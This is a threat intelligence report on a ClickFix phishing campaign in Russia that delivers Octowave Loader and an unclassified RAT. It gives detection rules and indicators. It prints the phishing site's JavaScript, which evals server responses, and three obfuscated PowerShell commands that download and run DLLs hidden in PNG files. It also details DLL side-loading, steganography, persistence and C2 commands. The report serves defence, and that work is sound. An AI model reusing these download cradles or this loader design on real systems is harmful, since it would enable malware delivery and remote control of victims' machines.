ClickFix makes its way into Russia
In early June 2025, BI.ZONE Threat Intelligence detected targeted ClickFix campaigns. This social engineering technique tricks users into running malicious scripts. Previously, ClickFix had only been seen outside Russia, but the adversaries have since adapted their approach to target the Russian region.
Threat actors often send phishing emails impersonating major or well‑known organizations or reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable logos and other branding elements make phishing emails appear more authentic, prompting victims to open them. It is important to remember that the brands cannot be liable for the actions of criminals and associated damage.
- Adversaries continuously update their techniques and customize them for the target region.
- DLL side-loading is becoming increasingly common. This technique significantly complicates attack detection due to the use of trusted executables.
- Adversaries continue to develop their own tools despite the abundance of malware on underground websites and in open sources.
The adversaries used phishing emails to disseminate PDF files with embedded links that redirected users to the attackers’ website, which was designed for ClickFix social engineering.
The PDF documents could be passed off as risk analysis reports, permission requests, letters of reprimand, and inspection statements from counterparties. However, the text of the documents was blurred making it impossible to read.
The users were prompted to continue reading the document after clicking “I’m not a robot,” however, the button was embedded with a link to the attackers’ website, which looked well-designed and legitimate. On it, the users came up against a CAPTCHA test.
Meanwhile, the website ran a JavaScript, which had the following tasks:
- Disable the context menu.
- Obtain user GPU information.
- Obtain the CSRF token from cookie (not invoked).
- Process clicks on .captcha class element.
- Process server response and execute its return content via eval().
- Play progress animation of moving to the next step.
document.addEventListener('contextmenu', (e) => {
e.preventDefault();
});
function getGPUInfo() {
...
const renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
return renderer
}
function getCSRFToken() {
return document.cookie
.split('; ')
.find(row => row.startsWith('csrftoken='))
?.split('=')[1];
}
document.querySelector('.captcha').addEventListener('click', (e) => {
...
});
body: JSON.stringify({
'key': '83566597554029358131608101665069',
'gpu': getGPUInfo()
})
.then(data => {
setTimeout(() => {
eval(data);
...
}, 1500);
})
By pressing “I’m not a robot” on the attackers’ website, the users unknowingly copied a PowerShell command to the clipboard, then the webpage displayed instructions for completing the verification and finally accessing the document. But in reality, these instructions led to the execution of the copied script.
In our research case, the threat actors employed several PowerShell commands, some of which are presented below:
powershell -nop -w Hidden -c "$b=(iwr 'i.imghippo[.]com/files/wN1688B.png').Content;function q($o,$s){-join[char[]]$b[$o..($o+$s-1)]};[io.file]::WriteAllBytes((q 56 40),$b[241..(241+31261183)]);saps (q 124 12) -a (q 169 51)"
powershell -nop -w Hidden -c "$b=(New-Object System.Net.WebClient).DownloadData('hxxp://docrf[.]org:7891/yandex.png');function q($o,$s){-join[char[]]$b[$o..($o+$s-1)]};[io.file]::WriteAllBytes((q 56 40),$b[241..11150064]);saps (q 124 12) -a (q 169 51)"
powershell -nop -w Hidden -c "$b=(iwr 'i.imghippo[.]com/files/SS4638dPY.png').Content;function q($o,$s){-join[char[]]$b[$o..($o+$s-1)]};[io.file]::WriteAllBytes((q 56 40),$b[241..(241+11149823)]);saps (q 124 12) -a (q 169 51)"
Notably, some scripts used Imghippo, a legitimate image hosting service.
The PowerShell commands were designed to perform the following actions:
- download from a specified link a PNG file that contains a dynamic link library (DLL)
- using specified offset conditions, extract from the PNG file the following:
- location of the saved DLL, for example: C:\Users\Public\Downloads\LicChecker.dll
- DLL run parameters, for example: rundll32.exe C:\Users\Public\Downloads\LicChecker.dll,Initialize
The DLL file is, in fact, a malware called Octowave Loader, which is implemented as Squirrel Installer. Octowave Loader includes the following components:
- the installer of legitimate software
- a malicious library loaded via DLL side-loading
- a WAV file with a steganographically embedded shellcode
- an executable extracted by the shellcode
The installer has the following functionality:
- Extract from the resource section a ZIP archive and save it under TMP[a-f0-9]{4}.tmp in the %TEMP% directory.
- Create a directory where to unzip the ZIP archive. It could be %LOCALAPPDATA%\Programs\Adobe Printer Driver or %LOCALAPPDATA%\Programs\Adobe CoreSync.
- After unzipping, search the directory for a legitimate executable AGF3DPrinterDriver.exe (or CoreSync.exe) using the substring *ver.e* (or *nc.e*). Then launch this executable using ShellExecuteW("open").
The directory with the unzipped archive contains the following set of files: a legitimate executable (AGF3DPrinterDriver.exe or CoreSync.exe), a large amount of legitimate libraries, a malicious library (apiecho.dll or D3Help3.dll), a WAV file (Update.wav or Annual.wav), an encrypted loader config file (Cleanup.raw or Supplement.pak).
The DLL side-loading technique is implemented as follows:
- exe loads the legitimate library tbb.dll, which then loads the malicious library apiecho.dll.
- exe loads the legitimate library gude.dll, which then loads the malicious library D3Help3.dll.
The malicious library reads the WAV file, decodes the shellcode, which in turn, calls the WAV file to get an executable component of Octowave Loader.
The executable loader component decodes the cofig file (.raw or .pak) to get the final malicious payload—a shellcode which is a RAT, not classified or described by any researcher previously.
All malicious activity takes place inside the process memory of a legitimate AGF3DPrinterDriver.exe (CoreSync.exe).
Octowave Loader creates copies of the config files. Both cases presented below:
- %LOCALAPPDATA%\Programs\Adobe Printer Driver\Galleries\Achievement.db
- %LOCALAPPDATA%\Programs\Adobe CoreSync\CoreSync\Analysis.db
Octowave Loader achieves persistence using a Run registry key and a task in Windows Task Scheduler:
Registry:
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] Adobe Printer Driver = "%LOCALAPPDATA%\Programs\Adobe Printer Driver\AGF3DPrinterDriver.exe"
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] Adobe Sync Pro = "%LOCALAPPDATA%\Programs\Adobe CoreSync\CoreSync\CoreSync.exe"
Windows Task Scheduler:
- A new task, Adobe Printer Driver, initiates the %LOCALAPPDATA%\Programs\Adobe Printer Driver\AGF3DPrinterDriver.exe process when a user logs in to the system.
- A new task, Adobe Sync Pro, initiates the %LOCALAPPDATA%\Programs\Adobe CoreSync\CoreSync\CoreSync.exe process when a user logs in to the system.
The decoded shellcode from the Octowave Loader config file is an unclassified RAT. We suspect the adversaries developed this malware on their own.
RAT functions:
- Obtain addresses compatible with the malware’s operation. The names of functions have been hashed using the MurmurHash3 algorithm.
- Create file %ProgramData%\lockfile and invoke the API function LockFile. Perhaps, the file is used as a marker or a mutex.
- Check for the registry key [HKCU\SOFTWARE\<GetVolumeInformation()>], where GetVolumeInformation() is taken from C:\. If such key does not exist, the RAT creates it. Then it creates the parameter Default = <CoCreateGuid()>, where CoCreateGuid() generates GUID. Example: [HKEY_CURRENT_USER\SOFTWARE\1239653d48e59] @="3564fcfb-e6e1-458c-a348-9ce11f88caef"
- Collect initial information about a compromised system. The collected information includes: malware GUID, PC name (NetBIOS), username (GetEnvironmentVariableW("USERNAME")), PC name (GetEnvironmentVariableW("COMPUTERNAME")), domain (GetEnvironmentVariableW("USERDOMAIN")), Windows OS version, system architecture, name of the process in which the malware is executed, user permissions.
- Encrypt the collected information using the ChaCha20 algorithm and send it to the C2 server via an HTTP POST request to the network address hxxp://82.117.87[.]103/q?=furries. When sending the network request, the following header is used: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.7.00.3653 Chrome/102.0.5005.197 Electron/19.1.8 Safari/537.36.
The server returns, presumably, something as follows:
struct CommandPacket
{
int status; (values 1 or 0, where 1 executes the commands, and 0 puts the program to sleep for 2 minutes)
struct PSCommandList *ps_cmds; (list of PowerShell commands)
struct Command *commands; (variety of commands performed by the RAT)
};
PowerShell command list sctructure:
struct PSCommandList
{
struct PSCommandList *next;
void *result_identifier;
char *command_to_execute;
};
Command structure:
struct Command
{
struct Command *next;
char *result_data_to_send;
char *download_url;
int command_type;
char *dll_params;
};
Notably, all the structures make up a single linked list.
- PowerShell command execution. The commands are executed as follows: %WINDIR%\System32\WindowsPowershell\v0\powershell.exe -NoLogo -NoProfile -Command <command>. The result is sent to the C2 server.
- Execution of commands received from the C2 server:
| Command code | Description |
|---|---|
| 1 |
Download from the C2 provided link an EXE file, save it under an arbitrary name [a-z]{20}\.exe to the %TEMP% directory, run the downloaded file using ShellExecuteW("open", <filePath>). |
| 2 |
Obtain DLL run parameters from the PowerShell link, use the C2 provided link to download a DLL file and save it under an arbitrary name [a-z]{20}\.dll to the %TEMP% directory, run the downloaded file using ShellExecuteW("open") and rundll32.exe. Thus creating a string: %WINDIR%\System32\rundll32.exe <dllPath>,<Params>. |
| 3 |
Use the C2 provided link to download a DDL file and save it under an arbitrary name [a-z]{20}\.dll to the %TEMP% directory, run the downloaded file using ShellExecuteW("open") and regsvr32.exe. Thus creating a string: %WINDIR%\System32\regsvr32.exe /s |
| 4 |
The function does nothing, returns the value 1. Either the adversaries failed to implement the command execution logic, or they use this command as a ping/heartbeat, which always returns 1. |
673e826846b40f16508677efe1c7a272865157fb48c1f81ff7975af3b2a3149e
b984fc4ba98c3e787eaa7c8bb0def3f704849753bb1a51af816bdc91be24d3e4
2c86d226fb4584ca7bd1284600b8c6ea5a1f312de78595b5c22ff6bc1c6522f3
3ee3d3d0a515b24f1b104cb8ec1b8d01b5af63c55c9c8424230826b736d70549
2ab9b583b5c85b3c2e927d02f7ee316f9e5eaf2db394a8c1d970b428dabe08a0
cce5b6dcdfa69e1b1e3d78ec1d3ec09c12861bf95e033d79aabe9bd2d28577ce
97b507a8d197ad901b6de1e9042b7ab94b0d263dd6c0852600ac7b80754fd686
ef16edc3b8de0f6456b4ecde12a90dc1b1678816390d01d187c73edfbaff2249
acbfd3f0768fe1f730c6f93fec4b2a9761c469226d5ac00ca7a15358e656a226
0f8635172da61dc6161b428a6b120461b5a9b04165483374b15beca5f0a12bc8
e633535706b7654f458ada840be494f7460a8fbfbf0078c95dc5785213ba14de
yasec[.]ru
docrf[.]org
82.117.87[.]103
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access |
Phishing |
The adversaries distribute malicious PDF documents via phishing emails |
| Execution |
Command and Scripting Interpreter: PowerShell |
The adversaries use PowerShell commands to download and run malicious code |
|
Native API |
The adversaries leverage an unclassified remote access trojan to run C2 provided executable files using ShellExecuteW("open") |
|
|
User Execution: Malicious Link |
The adversaries attempt to trick the user into clicking the link in the PDF document and going through a fake CAPTCHA |
|
|
User Execution: Malicious File |
The user has to run the malicious PDF document with a fake CAPTCHA and redirect themselves to the attackers’ website via an embedded link |
|
|
User Execution: Malicious Copy and Paste |
The adversaries attempt to trick the victim into executing a malicious PowerShell command using the following actions: Win+R -> Ctrl+V -> Enter |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
The adversaries leverage Octowave Loader to gain persistence using the Run registry key |
|
Scheduled Task/Job: Scheduled Task |
The adversaries leverage Octowave Loader to gain persistence by creating tasks in Windows Task Scheduler |
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
The adversaries load a malicious Octowave Loader DLL to decrypt from a WAV file a shellcode, which then decrypts and runs the Octowave Loader EXE component. The adversaries decrypt the encrypted Octowave Loader config file to obtain the final payload |
|
Hijack Execution Flow: DLL |
The adversaries employ DLL side-loading to launch the malicious Octowave Loader DLL using a legitimate executable file (AGF3DPrinterDriver.exe, CoreSync.exe) |
|
|
Obfuscated Files or Information |
The adversaries use stack-generated strings in the unclassified RAT |
|
|
Obfuscated Files or Information: Steganography |
The adversaries use PNG files to store the Octowave Loader executable. The adversaries use WAV files to store shellcodes and Octowave Loader executable component |
|
|
Obfuscated Files or Information: Dynamic API Resolution |
The adversaries use MurmurHash3 to hash function names in the unclassified RAT |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
The adversaries store the final payload in an encrypted Octowave Loader config file |
|
| Discovery |
Process Discovery |
The adversaries use the unclassified RAT to obtain the name of the process in which the malware is executed |
|
System Information Discovery |
The adversaries use the unclassified RAT to obtain the name of the system domain, Windows OS version, architecture |
|
|
System Owner/User Discovery |
The adversaries use the unclassified RAT to obtain username, computer name, user permissions |
|
| Command and Control |
Application Layer Protocol: Web Protocols |
The adversaries use the unclassified RAT which transmits the collected system data in encrypted form via an HTTP POST request |
|
Encrypted Channel: Symmetric Cryptography |
The adversaries use ChaCha20 to encrypt C2 commands in the unclassified RAT |
|
|
Ingress Tool Transfer |
The adversaries use the unclassified RAT to load and run executables from the C2 server |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
- win_th_start_hidden_powershell
- win_suspicious_powershell_download_cradles
- win_th_runonce_autorun_add
- gen_ti_wolfs_network_ioc_was_detected
- gen_ti_wolfs_hash_was_detected
Use the following hypotheses to proactively search for cyber threats:
- rundll32.exe and regsrv32.exe being used to run DLLs from %Temp%, %Users%, %AppData%
- Check the Run/RunOnce registry hives for suspicious files in %LOCALAPPDATA%\Programs\ folders.
- Check the Task Scheduler for suspicious files being run from %LOCALAPPDATA%\Programs\ folders.
Do not open files and links from unknown recipients. Threat actors disseminate malware through phishing emails in hopes of catching an unsuspecting user. It is also important to stay up to date with the ever-changing attack techniques. For this, we recommend using the data from the BI.ZONE Threat Intelligence portal. It presents the latest data about cyberattacks, activity clusters, their tactics, techniques, and preferred tools, as well as information from underground resources. This information enables a proactive protection of your company and a swift response to new cybersecurity incidents.